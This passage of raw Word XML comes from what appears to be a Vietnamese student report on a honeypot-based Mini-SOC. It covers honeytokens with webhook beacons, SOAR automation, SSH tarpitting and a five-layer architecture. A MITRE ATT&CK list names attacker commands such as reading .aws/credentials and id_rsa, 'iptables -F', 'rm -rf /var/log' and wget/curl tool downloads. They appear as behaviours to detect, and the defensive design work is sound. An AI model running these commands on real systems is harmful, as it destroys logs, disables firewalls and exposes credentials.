      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Bước 2 - Đánh cắp (Exfiltration): Khi kẻ tấn công xâm nhập thành công vào Honeypot qua SSH, đối phương sẽ sử dụng lệnh 'cat' hoặc dùng SFTP để tải các tệp tin này về máy của chúng.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Bước 3 - Thử nghiệm (Weaponization &amp; Trigger): Kẻ tấn công muốn sử dụng tài khoản AWS hoặc mật khẩu vừa đánh cắp. Để làm điều đó, chúng sẽ mở tài liệu trên trình duyệt hoặc chạy lệnh curl xác thực tài khoản. Tuy nhiên, các thông tin trong file bẫy đều được nhúng sẵn một mã định danh theo dõi (Canary Webhook Beacon).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Bước 4 - Lật tẩy Danh tính Thật (De-cloaking): Khi kẻ tấn công kích hoạt đường link trên máy cá nhân của chúng (nơi chúng không bật proxy hoặc đã ngắt kết nối SSH bẫy), gói tin HTTP request sẽ gửi thẳng về Webhook Server của ta. Lúc này, hệ thống sẽ ghi nhận được: Địa chỉ IP thực của hacker, Nhà mạng Internet thực tế (ISP), Thông số User-Agent trình duyệt và Hệ điều hành máy thật của hacker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2.5 Khung Tự động hóa và Điều phối Phản ứng Sự cố An ninh (SOAR)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Khái niệm SOAR (Security Orchestration, Automation, and Response) được hãng nghiên cứu Gartner định hình vào năm 2017, đại diện cho thế hệ công nghệ quản trị an ninh mạng hợp nhất ba năng lực cốt lõi: Quản lý mối đe dọa và lỗ hổng (Threat &amp; Vulnerability Management), Tự động hóa vận hành an ninh (Security Operations Automation) và Điều phối phản ứng sự cố (Incident Response Orchestration).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Trong một trung tâm điều hành SOC tiêu chuẩn, thời gian trung bình để phản ứng (Mean Time to Respond - MTTR) là thước đo sống còn đối với sự an toàn của doanh nghiệp. Nếu không có SOAR, một chu trình phản ứng bao gồm 4 bước tách rời:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1. Phát hiện: Chuyên viên nhìn thấy log cảnh báo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2. Xác minh: Chuyên viên copy IP lên AbuseIPDB, VirusTotal để kiểm tra danh tiếng.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3. Quyết định: Đánh giá xem IP có phải là IP quét nguy hại không.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4. Khắc phục: SSH vào Firewall để gõ lệnh chặn IP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Quy trình thủ công này thường mất 15-20 phút và dễ mắc lỗi do con người. Với SOAR, toàn bộ quy trình này được mã hóa thành các kịch bản thực thi tự động (Automated Playbooks). Khi có sự kiện đạt ngưỡng vi phạm, Playbook sẽ tự động chạy trong vài trăm mili-giây, thực hiện trinh sát, cập nhật bảng luật tường lửa và gửi thông báo tổng hợp tới thiết bị của chuyên viên, giảm MTTR xuống mức gần bằng 0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="80" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="3092335"/>
            <wp:docPr id="3" name="Picture 3"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="hinh_2_3_vong_doi_nist_soar.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="3092335"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="160" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hình 2.3: Vòng đời xử lý sự cố an ninh chuẩn NIST SP 800-61 r2 tích hợp SOAR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2.6 Kỹ thuật Giam lỏng và Tiêu hao Tài nguyên Kẻ tấn công (Connection Tarpitting)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Tarpit (Hố nhựa đường) là một kỹ thuật mạng phòng thủ chủ động cực kỳ độc đáo và hiệu quả cao trong việc đối phó với các đợt tấn công từ điển tự động. Khác với cơ chế Tường lửa truyền thống (lập tức gửi cờ TCP RST hoặc âm thầm DROP gói tin), Tarpit chọn cách: Chấp nhận kết nối TCP của kẻ tấn công nhưng cố tình phản hồi dữ liệu với tốc độ chậm nhất có thể (chẳng hạn như gửi từng ký tự banner SSH cách nhau 10 đến 15 giây).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Tác động tiêu hao đối với Kẻ tấn công:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Các công cụ tấn công brute-force tự động (như Hydra, Medusa, hay các botnet script) hoạt động dựa trên cơ chế đa luồng (Multi-threading). Mỗi luồng sẽ mở một socket TCP tới máy chủ mục tiêu và chờ đợi phản hồi để thử tiếp mật khẩu khác. Khi bị chuyển hướng vào Tarpit:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Socket của kẻ tấn công bị 'treo' vô thời hạn, không bị ngắt kết nối nhưng cũng không thể gửi tiếp yêu cầu mới.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Bảng tài nguyên kết nối (File Descriptors / Socket Pool) trên máy tấn công bị lấp đầy và cạn kiệt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Cuộc tấn công bị tê liệt hoàn toàn mà kẻ tấn công không hề nhận được bất kỳ tín hiệu lỗi nào để khởi động lại tiến trình.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2.7 Khung ma trận TTPs chuẩn MITRE ATT&amp;CK trong Phân tích Hành vi Tấn công</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK (Adversarial Tactics, Techniques, and Common Knowledge) là một cơ sở tri thức toàn cầu chuẩn hóa hành vi của các tác nhân đe dọa dựa trên các quan sát thực tế trong thế giới thực. Việc áp dụng MITRE ATT&amp;CK vào hệ thống Honeypot cho phép chuẩn hóa các sự kiện kỹ thuật thô thành các kỹ thuật tác chiến có ý nghĩa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Trong đồ án này, các kỹ thuật cốt lõi sau được nhận diện và ánh xạ tự động:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• T1110 (Brute Force) / T1110.001 (Password Guessing): Hành vi thử liên tiếp nhiều cặp mật khẩu vào tài khoản root/admin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• T1078 (Valid Accounts): Hành vi đăng nhập thành công vào Honeypot bằng tài khoản mặc định hoặc đoán trúng.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• T1082 (System Information Discovery): Các lệnh thu thập thông tin hệ thống do hacker thực thi ngay sau khi đăng nhập (uname -a, cat /etc/issue, cat /proc/cpuinfo).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• T1059 (Command and Scripting Interpreter): Hành vi thực thi các câu lệnh bash, python, sh bên trong terminal ảo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• T1105 (Ingress Tool Transfer): Kỹ thuật tải công cụ và mã độc từ máy chủ C2 về máy bẫy thông qua wget hoặc curl.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• T1552.001 (Credentials In Files): Kỹ thuật tìm kiếm và đọc các tệp tin chứa thông tin nhạy cảm (.aws/credentials, id_rsa, db_dump).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• T1562.001 (Impair Defenses - Disable or Modify Tools): Hành vi gõ lệnh nhằm tắt tường lửa hoặc xóa lịch sử log (iptables -F, rm -rf /var/log).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="003366"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>CHƯƠNG 3: THIẾT KẾ KIẾN TRÚC HỆ THỐNG MINI-SOC ACTIVE DEFENSE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>3.1 Yêu cầu Bài toán và Thiết kế Kiến trúc Phân lớp Tổng thể</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Để giải quyết toàn diện bài toán phòng thủ chủ động và vượt qua giới hạn của việc cài đặt ứng dụng đơn thuần, hệ thống được thiết kế theo mô hình Kiến trúc Phân lớp Mini-SOC 5 tầng (5-Layer Architecture). Mỗi tầng đảm nhiệm một vai trò chuyên biệt, độc lập và giao tiếp với nhau thông qua các giao diện lập trình hướng sự kiện (Event-driven Interfaces):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Tầng 1: Lớp Cảm biến &amp; Đánh lừa Chủ động (Active Deception &amp; Honeypot Layer) - Đóng vai trò là tuyến đầu tiếp nhận tấn công, gồm Cowrie Honeypot tùy biến, hệ thống tệp tin giả lập và các tệp tin mồi nhử Honeytoken có nhúng Webhook Beacon.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Tầng 2: Lớp Thu thập &amp; Xử lý Luồng Sự kiện (Event Ingestion &amp; Streaming Layer) - Chịu trách nhiệm theo dõi tệp tin nhật ký cowrie.json theo cơ chế stream thời gian thực, chuẩn hóa các trường dữ liệu và bóc tách các tham số IP, tài khoản, câu lệnh và băm tệp tin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Tầng 3: Lớp Tương quan &amp; Định danh Tác chiến (Correlation &amp; Threat Intelligence Layer) - 'Bộ não' của hệ thống, chứa thuật toán cửa sổ trượt (Sliding Window Algorithm) để phát hiện Brute-force, tự động ánh xạ sự kiện sang chuẩn MITRE ATT&amp;CK và kích hoạt phân hệ Trinh sát ngược (Reverse Reconnaissance).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Tầng 4: Lớp Thực thi Phản ứng Tự động (SOAR Enforcement &amp; Active Counter-measure Layer) - Chứa các cơ chế phản đòn hợp pháp: Giam lỏng kết nối vào Tarpit để khóa cứng luồng quét của hacker, tự động cập nhật iptables/nftables để ngăn chặn xâm nhập và xuất bản danh sách đen IOCs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Tầng 5: Lớp Giám sát &amp; Điều khiển Tương tác 2 Chiều (Bidirectional Command &amp; Monitoring Layer) - Cung cấp giao diện trực quan thông qua Telegram SOAR Bot với các nút bấm tương tác (Inline Buttons), cho phép chuyên viên SOC can thiệp và kích hoạt các hành động phòng thủ chỉ bằng một chạm.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="80" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="3591098"/>
            <wp:docPr id="4" name="Picture 4"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="hinh_3_1_kien_truc_5_phan_lop.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="3591098"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="160" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
